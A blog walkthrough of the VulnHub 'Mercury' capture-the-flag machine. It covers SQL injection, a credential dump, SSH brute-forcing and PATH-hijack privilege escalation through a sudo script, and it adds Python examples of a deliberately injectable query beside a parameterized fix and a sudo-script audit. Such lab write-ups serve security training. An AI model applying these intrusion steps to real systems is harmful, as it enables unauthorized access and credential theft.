<p><b>THE PLANETS: MERCURY Walkthrough - VulnHub</b> (Won't Fix!!! blog of Latish Danawale, published 2020-10-04)</p><h1><u style="color: white; font-family: arial; font-size: xx-large;">Introduction</u></h1><p>Getting back to CTF solving after a looong break is a difficult task. So, I decided to proceed with an EASY challenge, and <span style="font-family: inherit;">VulnHub </span>was the obvious place to find one. After a few searches, I found a perfect machine to start with - <b>'The Planets: Mercury'</b>. This boot2root machine has 2 flags: USER & ROOT. The USER flag can be obtained by <i><span style="color: #3d85c6;"><b>SQLi </b>==> <b>Creds </b>==> <b>SSH </b>==> <b>FLAG</b></span></i>. The ROOT flag is where an interesting PrivEsc lies. Hope you find this writeup interesting & useful!</p><div><h1><span style="color: white; font-family: arial; font-size: x-large;"><u>Information Gathering</u></span></h1></div><h4><span style="color: white; font-family: arial; font-size: large;">Port Scan: Nmap</span></h4><p>To begin reconnaissance, let's find the open ports with Nmap, with service version detection enabled:</p><p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjeTrK5EvQD3piOuJ4Q2PzYWr5zBz0f78Sr7a3JBnpAvjEyj4kjuzUf4RIXvu9hbVQzfPYrQUlwMTA1MTCkO_TTzTEeFOGrZhgH9Dm5m0QKU5dSYVb80qKzTEUfBmQW0fbrCouKVMIzAY/s734/portscan.png" style="clear: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="129" data-original-width="734" height="112" 
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjeTrK5EvQD3piOuJ4Q2PzYWr5zBz0f78Sr7a3JBnpAvjEyj4kjuzUf4RIXvu9hbVQzfPYrQUlwMTA1MTCkO_TTzTEeFOGrZhgH9Dm5m0QKU5dSYVb80qKzTEUfBmQW0fbrCouKVMIzAY/w667-h112/portscan.png" width="667" /></a></p><h4><span style="color: white; font-family: arial; font-size: large;">Port 8080</span></h4><h4><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgplHOmEsXig9x_APUoaBafrGcr4GPpFxtUzxmYUShCSKw4yN2wy8baPe2sGHshrErIHsozVy5YRzexTaQaYkcKaiZ9_GMc9DBpmHrSeEGJiT-6-xHSdJox42eMbcU2V-NIwXDZAQUzDXQ/s1920/webservice.png" style="clear: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="231" data-original-width="1920" height="76" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgplHOmEsXig9x_APUoaBafrGcr4GPpFxtUzxmYUShCSKw4yN2wy8baPe2sGHshrErIHsozVy5YRzexTaQaYkcKaiZ9_GMc9DBpmHrSeEGJiT-6-xHSdJox42eMbcU2V-NIwXDZAQUzDXQ/w664-h76/webservice.png" width="664" /></a></h4><p>So this looks like a simple page with no secret or hint. Let's try accessing some common directories:</p><p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHYZAfLunI7-_yz1BfBFbzvU-L3vo3YMGRdlHP_e84pVRZ6thhvemzqE6R7Wk9bOZVlvck8yNylx9gvbrtNZ6FK0_dQKH9mzIJ_xFXNgPA09cgSzeB0eJquPp4wxug2ijx2VmMovHayeM/s1265/error.png" style="clear: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="428" data-original-width="1265" height="216" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHYZAfLunI7-_yz1BfBFbzvU-L3vo3YMGRdlHP_e84pVRZ6thhvemzqE6R7Wk9bOZVlvck8yNylx9gvbrtNZ6FK0_dQKH9mzIJ_xFXNgPA09cgSzeB0eJquPp4wxug2ijx2VmMovHayeM/w668-h216/error.png" width="668" /></a></p><p>Visiting the '<i>admin</i>' directory, we got an error page. This happens because the site is built on <b>Django </b>with <i><b><span style="font-family: courier;">Debug </span></b></i>set to <b><span style="font-family: courier;">True</span></b>. Luckily for us, the URL configuration is reflected on the error page. Let's visit '<i><span style="font-family: courier;">mercuryfacts</span></i>':</p><p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7bQyGKOrlKlwVqUaSVeGqPpH50SHk7AX-vz7zGGZR4N3u42bKMdppys40hd85rg88RLs4AS_qfUtOAXWZ0mINNMBZsqDXuoSu2qU6q40dXJsdwucMp5ijyesj-zgewFked_5cIspMQDU/s977/mercuryfacts.png" style="clear: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="642" data-original-width="977" height="421" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7bQyGKOrlKlwVqUaSVeGqPpH50SHk7AX-vz7zGGZR4N3u42bKMdppys40hd85rg88RLs4AS_qfUtOAXWZ0mINNMBZsqDXuoSu2qU6q40dXJsdwucMp5ijyesj-zgewFked_5cIspMQDU/w665-h421/mercuryfacts.png" width="665" /></a></p><p>This page has 2 URLs, a <b>To Do List</b> & a <b>Facts page</b>. The Facts page has interesting facts about Mercury, and more interestingly, each fact is assigned an ID:</p><p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhE1u7eqI1PM-JiImfLJF8DmJYZbxqEmuNGX-QIjOqquJWzn2WAB256Nia5yakFrCfLWgrVjnFbLLpcG5VqBrg-A7kUkklZoFM-ZKOi1S686uFyedKyT63SMBnGdzqkn7xOkovX7vRClWU/s1309/fact-1.png" style="clear: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="279" data-original-width="1309" height="136" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhE1u7eqI1PM-JiImfLJF8DmJYZbxqEmuNGX-QIjOqquJWzn2WAB256Nia5yakFrCfLWgrVjnFbLLpcG5VqBrg-A7kUkklZoFM-ZKOi1S686uFyedKyT63SMBnGdzqkn7xOkovX7vRClWU/w664-h136/fact-1.png" width="664" /></a></p><p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigVGkDj9Au3Gr44ZoVOi0HR3rT6uXNbRLE0xuw6zOEFpupPNIqiOzFqFvRUIDlXEN7OMXNM0kDZcQeCPdBc8wv7LglvW8yBJzs0LrXIYmDKtDhzoJDM5L1Asg1bZmN7aEbf1vSh-KAdF4/s1415/fact-2.png" style="clear: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="280" data-original-width="1415" height="126" 
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigVGkDj9Au3Gr44ZoVOi0HR3rT6uXNbRLE0xuw6zOEFpupPNIqiOzFqFvRUIDlXEN7OMXNM0kDZcQeCPdBc8wv7LglvW8yBJzs0LrXIYmDKtDhzoJDM5L1Asg1bZmN7aEbf1vSh-KAdF4/w664-h126/fact-2.png" width="664" /></a></p><p>This is an SQL lookup: the <b>fact</b> changes along with the ID in the URL. Let's try to break the query and confirm the SQLi:</p><p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQFZ8PljON-dMJyBoexuWl8KN4Pk_XGkiycLvmRsuJHsaeUlc-6MMxn8V10yCyBCOfw3rgfQ_UI6NjaNw4zOG9Ol57M1ppHyxlEV4WAROXPnXCl03HVaTrR2Hal8tTygDYIqOb8A9PwLM/s1920/sql-error.png" style="clear: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="872" data-original-width="1920" height="290" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQFZ8PljON-dMJyBoexuWl8KN4Pk_XGkiycLvmRsuJHsaeUlc-6MMxn8V10yCyBCOfw3rgfQ_UI6NjaNw4zOG9Ol57M1ppHyxlEV4WAROXPnXCl03HVaTrR2Hal8tTygDYIqOb8A9PwLM/w665-h290/sql-error.png" width="665" /></a></p><div>The debug information on this SQL error page shows that the URL string is inserted directly into the SQL statement used to query the database for facts.</div><div><br />Let's add the universal <b>True</b> condition to this statement to start with:</div><div><br /></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhttnZ2hdwChKaF6vY9DZgqc7hYupJCVW2x-YM0JzbAdlASy4IoAkgWnsrVscPYOTnlJvi028T99rn9XHIaB7TCI12T7_LkXhhyphenhyphenuLZfeJNDF_7DWh2KkpMeIMvRYzC6oqxpR-pT4WGbp7w/s1920/1or1.png" style="clear: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="272" data-original-width="1920" height="90" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhttnZ2hdwChKaF6vY9DZgqc7hYupJCVW2x-YM0JzbAdlASy4IoAkgWnsrVscPYOTnlJvi028T99rn9XHIaB7TCI12T7_LkXhhyphenhyphenuLZfeJNDF_7DWh2KkpMeIMvRYzC6oqxpR-pT4WGbp7w/w665-h90/1or1.png" width="665" /></a></div><div><br /></div><div>Worked as expected! Given the always-true condition, the database returned all the facts. Now let's exploit this further to dump out the database.</div><div><br /></div><div><h1><span style="color: white; font-family: arial; font-size: x-large;"><u>Exploitation</u></span></h1></div><div>With '<i><b>order by</b></i>', let's find out the number of columns the query returns:</div><div><br /></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqKspuOr_L8Xz-itNTfsKEJt3KgMxki6KHQ0wBlqWwf_jQGLxWHc-BZzJB2nXMuR8icRf4h4yPS0q9TV_mfOWhBkPTo4XmHBuM4OJrMgTOTQlapdpcI6eNg1e3aOGBWl8XMbwJrrciK_w/s1102/order+by+1.png" style="clear: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="271" data-original-width="1102" height="158" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqKspuOr_L8Xz-itNTfsKEJt3KgMxki6KHQ0wBlqWwf_jQGLxWHc-BZzJB2nXMuR8icRf4h4yPS0q9TV_mfOWhBkPTo4XmHBuM4OJrMgTOTQlapdpcI6eNg1e3aOGBWl8XMbwJrrciK_w/w664-h158/order+by+1.png" width="664" /></a></div><div><br /></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtYskFAUTd5Ot-lfXyXTvU3wQlKW2pBXphjeCnVIADQPvNI-qdPAn_d_lSOB_IuaoJCfbKE8iyPZFtKTHzs13nQJwUJtgfrYkTeDmzHwWthpSSIVi-tHNEpnP6hCTs6X4GPhHrsu0unNs/s1368/order+by+2.png" style="clear: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="403" data-original-width="1368" height="188" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtYskFAUTd5Ot-lfXyXTvU3wQlKW2pBXphjeCnVIADQPvNI-qdPAn_d_lSOB_IuaoJCfbKE8iyPZFtKTHzs13nQJwUJtgfrYkTeDmzHwWthpSSIVi-tHNEpnP6hCTs6X4GPhHrsu0unNs/w665-h188/order+by+2.png" width="665" /></a></div><div><br /></div><div><div>As can be seen, the query returns only one column, as we got an error at 2. 
Moving ahead with the '<b><i>UNION</i></b>' statement, let's find the DB name:</div><div><br /></div></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhellmpfCjSJkpQ8AMXqxmrmFefUnAhZRdPvoMI-9WINH4JE1f6k2IWS6Wf5TlcbPXzAWsKWPNhQeYE_63Gyez8KBitOQNiIGEAK5OkqSCu7c3iCleTASRSnGnkl6pQZC55STxzEmoezKs/s1114/union+select+databasename.png" style="clear: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="190" data-original-width="1114" height="110" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhellmpfCjSJkpQ8AMXqxmrmFefUnAhZRdPvoMI-9WINH4JE1f6k2IWS6Wf5TlcbPXzAWsKWPNhQeYE_63Gyez8KBitOQNiIGEAK5OkqSCu7c3iCleTASRSnGnkl6pQZC55STxzEmoezKs/w666-h110/union+select+databasename.png" width="666" /></a></div><div><br /></div><div>Digging deeper, let's enumerate the table names in the database with reference to <b style="font-style: italic;"><span style="font-family: courier;">information_schema</span></b>:</div><div><br /></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVSLyvFZIivFnrA8OAyuy-Wb7Yi310uVURfSurcAOtnyt4N2oOgm5T6MC0Ta-Q7v9yl1blc0MCV6wTWXOrMFjJNpOyrkmKn8mtZ6pZ-IRIA21bVMmV0EgJqsKzuhA_WDYGxaB4Q6mv0Vo/s1736/table+names.png" style="clear: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="264" data-original-width="1736" height="98" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVSLyvFZIivFnrA8OAyuy-Wb7Yi310uVURfSurcAOtnyt4N2oOgm5T6MC0Ta-Q7v9yl1blc0MCV6wTWXOrMFjJNpOyrkmKn8mtZ6pZ-IRIA21bVMmV0EgJqsKzuhA_WDYGxaB4Q6mv0Vo/w666-h98/table+names.png" width="666" /></a></div><div><br /></div><div>The <b>USERS </b>table seems interesting; let's enumerate its columns:</div><div><br /></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDSAf1cuUp-RxOI7VmFDsmYqROlWbTpFDJjcoNWPWE3S2rLdNh9QySX9vmj8x-Pg5Xu_JN1nVC4PEMOgj1ttJy6lWdOQllOz0ZPBEaGoV0VQFzdFDtYgEBTXNtIs9QoI9dhYRpEIwB2II/s1676/columns+from+users.png" style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="270" data-original-width="1676" height="104" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDSAf1cuUp-RxOI7VmFDsmYqROlWbTpFDJjcoNWPWE3S2rLdNh9QySX9vmj8x-Pg5Xu_JN1nVC4PEMOgj1ttJy6lWdOQllOz0ZPBEaGoV0VQFzdFDtYgEBTXNtIs9QoI9dhYRpEIwB2II/w667-h104/columns+from+users.png" width="667" /></a></div><div><br /></div><div>The obvious choice is to proceed with dumping data from the <b><i>username </i></b>& <i style="font-weight: bold;">password</i> columns:</div><div><br /></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWtsZekBTVM6FvwlkoX-JkmBQJPDFJbjwFnc0MtkHBZ6fcVFoy0xrRuGkYL2m3tqMTLjutoad5_Q0cVLGq4tBIBif8xfSLMG6oi2yfd2wYdxzK0UBNTPw8Tsby45qzxq6QyOHoryUYgVg/s1259/sql+dump+usernames.png" style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="243" data-original-width="1259" height="124" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWtsZekBTVM6FvwlkoX-JkmBQJPDFJbjwFnc0MtkHBZ6fcVFoy0xrRuGkYL2m3tqMTLjutoad5_Q0cVLGq4tBIBif8xfSLMG6oi2yfd2wYdxzK0UBNTPw8Tsby45qzxq6QyOHoryUYgVg/w668-h124/sql+dump+usernames.png" width="668" /></a></div><div><br /></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgj7L8s5uNKd_tojF6_bttfR-2UOmm8vaz4Exds8vOy3XxjgyShARn1aR5EvQDVeMPxglrkIvZjpTpyZdeDhAe7hyphenhyphen72u9U1VAJDcM-jM8MITxrU7yFb4F089tD7OqggKxbtBdc12b1reys/s1701/sql+dump+passwords.png" style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="244" data-original-width="1701" height="92" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgj7L8s5uNKd_tojF6_bttfR-2UOmm8vaz4Exds8vOy3XxjgyShARn1aR5EvQDVeMPxglrkIvZjpTpyZdeDhAe7hyphenhyphen72u9U1VAJDcM-jM8MITxrU7yFb4F089tD7OqggKxbtBdc12b1reys/w666-h92/sql+dump+passwords.png" width="666" /></a></div><div>Remember, 
there's an SSH service running! We shall use these dumped credentials to log in via SSH. Rather than trying each username & password combination by hand, the MSF SSH login auxiliary module will be helpful here to brute-force the SSH login with the dumped credentials:</div><div><br /></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWF0UjG2ug769UuEbmEvSKEj13gB42a-P1YkzYhB4Jh_sHbGyOYHS7jQqQ0YCsZ2CeB8CudOVXD-ymHgX94TX0Zv9MwqbGEsoi7voxs1pesog5B8DkemYAVOpG2vawaoLrvfRfiHbRROo/s1077/ssh+aux.png" style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="366" data-original-width="1077" height="218" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWF0UjG2ug769UuEbmEvSKEj13gB42a-P1YkzYhB4Jh_sHbGyOYHS7jQqQ0YCsZ2CeB8CudOVXD-ymHgX94TX0Zv9MwqbGEsoi7voxs1pesog5B8DkemYAVOpG2vawaoLrvfRfiHbRROo/w668-h218/ssh+aux.png" width="668" /></a></div><div><br /></div><div>Success! We found the valid <b>username:password</b> combination:</div><div><br /></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRb_G8VPFM3UxDXQOrVY0ddXAvywkX8k6h71KKNWBy0vHd7Ce3tOBmzv-6wmFgttH-ptpi4m36q4EKut57lKEdudAi1RCH9t2kZRwK8OqmVajBIiOOqB1NF3PgjJr2V92raVmBGpQmaNo/s1909/msf+bruteforce.png" style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="378" data-original-width="1909" height="152" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRb_G8VPFM3UxDXQOrVY0ddXAvywkX8k6h71KKNWBy0vHd7Ce3tOBmzv-6wmFgttH-ptpi4m36q4EKut57lKEdudAi1RCH9t2kZRwK8OqmVajBIiOOqB1NF3PgjJr2V92raVmBGpQmaNo/w665-h152/msf+bruteforce.png" width="665" /></a></div><div><br /></div><div>Moving ahead, let's SSH in as <i><b>webmaster </b></i>and grab the <b>user flag</b>:</div><div><br /></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQ6QYLocQnUeWicBMS5FOyul7vGiMiYZwRZsYC1Gkpq72LrE8BX-ryjDUDMd9CzAWWvuNbD6SCyHzOWqwOrzJmvJ4Ul2zcThMaCf2AhE04XXl018O8OBN2R33sA9paxqp0Jy4nhTGTBAA/s857/user+compromised.png" style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="743" data-original-width="857" height="554" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQ6QYLocQnUeWicBMS5FOyul7vGiMiYZwRZsYC1Gkpq72LrE8BX-ryjDUDMd9CzAWWvuNbD6SCyHzOWqwOrzJmvJ4Ul2zcThMaCf2AhE04XXl018O8OBN2R33sA9paxqp0Jy4nhTGTBAA/w663-h554/user+compromised.png" width="663" /></a></div><div><br /></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-sgwVyweYl1FeQaGHU8kCbFlG-PwOOUl1witlI0vEA8LlCZuvkLpjkSXdekpSDCbyRdbUgLJfmEjKoBS8SkdycUDnFp17eU9cyjW1K9PvK-xKckxIr6SPOe8bulOZfV1-NVhjZBcd5Dg/s527/user+flag.png" style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="82" data-original-width="527" height="100" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-sgwVyweYl1FeQaGHU8kCbFlG-PwOOUl1witlI0vEA8LlCZuvkLpjkSXdekpSDCbyRdbUgLJfmEjKoBS8SkdycUDnFp17eU9cyjW1K9PvK-xKckxIr6SPOe8bulOZfV1-NVhjZBcd5Dg/w661-h100/user+flag.png" width="661" /></a></div><div><br /></div><div>Awesome! This was an easy catch. 
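<p>The facts lookup behind this whole chain, as an added example and not the Mercury VM's Django code: the ID from the URL is first spliced into the SQL text (the pattern the Django debug page exposed) and then bound as a parameter. The table rows, function names and in-memory SQLite database are constructed for the demo; Django's cursor.execute(sql, [params]) with %s placeholders behaves the same way, sqlite3's ? placeholder is used so the example runs stand-alone.</p>

```python
import sqlite3

# Added example, not the Mercury VM's Django code. The facts table, its rows
# and every function name here are constructed for the demonstration.


def build_facts_db():
    """In-memory stand-in for the facts table (constructed rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE facts (id INTEGER PRIMARY KEY, fact TEXT)")
    conn.executemany("INSERT INTO facts VALUES (?, ?)", [
        (1, "Mercury is the closest planet to the Sun."),
        (2, "Mercury is the smallest planet in the Solar System."),
        (3, "Mercury has no moons."),
    ])
    return conn


def fact_vulnerable(conn, fact_id):
    """The bug: the raw URL value becomes part of the SQL statement, so
    anything appended after the number is executed as SQL."""
    sql = "SELECT fact FROM facts WHERE id = " + fact_id
    return [row[0] for row in conn.execute(sql)]


def fact_parameterized(conn, fact_id):
    """The fix: validate the input shape, then let the driver bind the value.
    A bound value is data, never SQL, so 'or 1=1' cannot widen the query."""
    if not fact_id.isdigit():
        raise ValueError("fact id must be a positive integer")
    sql = "SELECT fact FROM facts WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (int(fact_id),))]


def compare(fact_id):
    """Run both lookups on the same input. Returns (vulnerable_rows, safe_rows);
    safe_rows is None when the hardened path rejected the input up front."""
    conn = build_facts_db()
    unsafe = fact_vulnerable(conn, fact_id)
    try:
        safe = fact_parameterized(conn, fact_id)
    except ValueError:
        safe = None
    return unsafe, safe


if __name__ == "__main__":
    print(compare("2"))         # both paths return the single fact with id 2
    print(compare("1 or 1=1"))  # vulnerable path returns every row; fixed path rejects
```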
But the really interesting technique lies in the Privilege Escalation part, so let's move ahead.</div><div><br /></div><div><h1><span style="color: white; font-family: arial; font-size: x-large;"><u>Privilege Escalation</u></span></h1></div><div>Exploring all the files & folders leads us to a secret note:</div><div><br /></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLJIrhh9e_yuGjgpz4Jjb_17dZDUZeDrEq-7jJmtwqshmfsjeQSQqzF7JqUuNJkp_OTzrYSNEuUkt2uA2_e_QmUE9R4Td-46TgEl-upmO3LaDMbHV3WD3RSxhLQDgsZy9y47mSQ_v6ePI/s778/linuxmaster+password.png" style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="276" data-original-width="778" height="228" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLJIrhh9e_yuGjgpz4Jjb_17dZDUZeDrEq-7jJmtwqshmfsjeQSQqzF7JqUuNJkp_OTzrYSNEuUkt2uA2_e_QmUE9R4Td-46TgEl-upmO3LaDMbHV3WD3RSxhLQDgsZy9y47mSQ_v6ePI/w667-h228/linuxmaster+password.png" width="667" /></a></div><div><br /></div><div>By decoding the <b>base64</b> value, we get the password for the <b><i>linuxmaster </i></b>user. 
Let's <b><i><span style="font-family: courier;">su </span></i></b>into it & look for the root flag:</div><div><br /></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6rVC04i78n4AIaaoxTcUIWnlYe0Wb789Mrbf1tJ84Psfq5vju0odB_5lZqdnvZA9LqUEE1qJW11wVY6oL0abHr6cLJqvVQq6BRbrXYFMiXRFQ-rMz8h0TAM4etg7QON6D4cPiuR_LBGU/s1047/login+to+linuxmaster.png" style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="293" data-original-width="1047" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6rVC04i78n4AIaaoxTcUIWnlYe0Wb789Mrbf1tJ84Psfq5vju0odB_5lZqdnvZA9LqUEE1qJW11wVY6oL0abHr6cLJqvVQq6BRbrXYFMiXRFQ-rMz8h0TAM4etg7QON6D4cPiuR_LBGU/w665-h180/login+to+linuxmaster.png" width="665" /></a></div><div><br /></div><div>Checking <i>linuxmaster's</i> privileges, we can see that the user is allowed to run <i style="font-weight: bold;"><span style="font-family: courier;">/usr/bin/check_syslog.sh</span></i> as root via sudo, but with the environment preserved. As a first step, let's read and understand the shell script:</div><div><br /></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbGE0QzPcqRQWos0Y0aj25_gZc0b1DaVqSAvOnwxwiKPxCu37JPWiU_SM0PpfEDBuGrxW6SywD0nNBSzuW-Z-LWMZXNOvxVjl19i0E50RcGo7iTudu7H_niNbHknXpJhRrnsNloXgL9V8/s824/cat+checksyslog.png" style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="129" data-original-width="824" height="100" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbGE0QzPcqRQWos0Y0aj25_gZc0b1DaVqSAvOnwxwiKPxCu37JPWiU_SM0PpfEDBuGrxW6SywD0nNBSzuW-Z-LWMZXNOvxVjl19i0E50RcGo7iTudu7H_niNbHknXpJhRrnsNloXgL9V8/w666-h100/cat+checksyslog.png" width="666" /></a></div><div><br /></div><div><div>As can be seen here, the user doesn't have write permission to modify the shell script. But, since the user can execute it and the <b><i><span style="font-family: courier;">tail </span></i></b>command is called inside the script (and resolved through PATH), we can take advantage of this by pointing <i>tail </i>at another executable that can spawn a bash shell!</div><div><br /></div><div>Being a Linux machine, this box has <b><i><span style="font-family: courier;">vim </span></i></b>like most others, and <i>vim</i> can spawn a shell! Let's symlink <i style="font-weight: bold;"><span style="font-family: courier;">tail </span></i>to <span style="font-family: courier;"><i style="font-weight: bold;">vim</i> </span>and prepend the current directory to the PATH environment variable:</div></div><div><br /></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIO-C0a3qtVE3vXGMsDpD03Mw3fPA0uRCIKJoimDhonMnF_miEyUdzSX08Yt48tjnGUHNDPnkY9RrFqfXaQoNrzoIWZk_5v5ACNQz9q7q_AeB6sv2fH2xOpdPzZWFtlMCoQEBIX8ePbVY/s546/symlinking.png" style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="80" data-original-width="546" height="94" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIO-C0a3qtVE3vXGMsDpD03Mw3fPA0uRCIKJoimDhonMnF_miEyUdzSX08Yt48tjnGUHNDPnkY9RrFqfXaQoNrzoIWZk_5v5ACNQz9q7q_AeB6sv2fH2xOpdPzZWFtlMCoQEBIX8ePbVY/w667-h94/symlinking.png" width="667" /></a></div><div><br /></div><div><div>Now, we should execute <i><span style="font-family: courier;">check_syslog.sh</span></i> with sudo in preserved-environment mode so that the symlink takes effect. 
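<p>A check a defender can run over any script that sudo lets a user run with a preserved environment, as an added example (not the VM's check_syslog.sh, nor a tool the author used): it lists the commands the script resolves through the caller's PATH, the property the symlink trick depends on, and reports nothing once the script pins PATH or calls commands by absolute path. The sample scripts, function names and findings text are constructed.</p>

```python
import re
import shlex

# Added example, not the VM's check_syslog.sh or any tool of the author's.
# Audits a script run through sudo with env preserved: reports commands the
# script looks up through the caller's PATH unless PATH is pinned or the
# commands use absolute paths. Sample scripts and helper names are constructed.

# Words that never go through a PATH lookup: shell keywords and common builtins.
NOT_PATH_LOOKUPS = {
    "if", "then", "elif", "else", "fi", "for", "while", "until", "do", "done",
    "case", "esac", "function", "cd", "echo", "exit", "export", "return", "set",
    "unset", "shift", "read", "test", "[", "[[", "true", "false", "local",
}
PATH_ASSIGNMENT = re.compile(r"^(export\s+)?PATH=")
VAR_ASSIGNMENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")


def pins_path(script_text):
    """True when the script assigns PATH itself (order is not checked)."""
    return any(PATH_ASSIGNMENT.match(line.strip()) for line in script_text.splitlines())


def path_resolved_commands(script_text):
    """Command names the script looks up through PATH, in order of appearance."""
    found = []
    for raw in script_text.splitlines():
        # Drop comments and the shebang (naive: a '#' inside quotes is cut too).
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        # Each side of a pipe or list operator is a fresh command position.
        for segment in re.split(r"\|\||&&|\||;", line):
            try:
                tokens = shlex.split(segment)
            except ValueError:              # unbalanced quotes: fall back to whitespace
                tokens = segment.split()
            while tokens and VAR_ASSIGNMENT.match(tokens[0]):
                tokens.pop(0)               # skip leading VAR=value prefixes
            if not tokens:
                continue
            cmd = tokens[0]
            if "/" in cmd or cmd in NOT_PATH_LOOKUPS:
                continue                    # explicit path or builtin: no PATH lookup
            found.append(cmd)
    return found


def audit_sudo_script(script_text):
    """Findings for a script run via sudo with env preserved; empty means clean."""
    cmds = path_resolved_commands(script_text)
    if not cmds or pins_path(script_text):
        return []
    return [
        f"'{c}' is found through the caller's PATH; call it by absolute path "
        f"or set PATH at the top of the script"
        for c in sorted(set(cmds))
    ]


# Constructed samples: the weak shape described in the writeup, and two fixes.
WEAK_SCRIPT = "#!/bin/bash\ntail -n10 /var/log/syslog\n"
PINNED_PATH_SCRIPT = "#!/bin/bash\nPATH=/usr/bin:/bin\ntail -n10 /var/log/syslog\n"
ABSOLUTE_PATH_SCRIPT = "#!/bin/bash\n/usr/bin/tail -n10 /var/log/syslog\n"

if __name__ == "__main__":
    for name, text in [("weak", WEAK_SCRIPT), ("pinned PATH", PINNED_PATH_SCRIPT),
                       ("absolute path", ABSOLUTE_PATH_SCRIPT)]:
        print(name + ":", audit_sudo_script(text) or "no findings")
```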
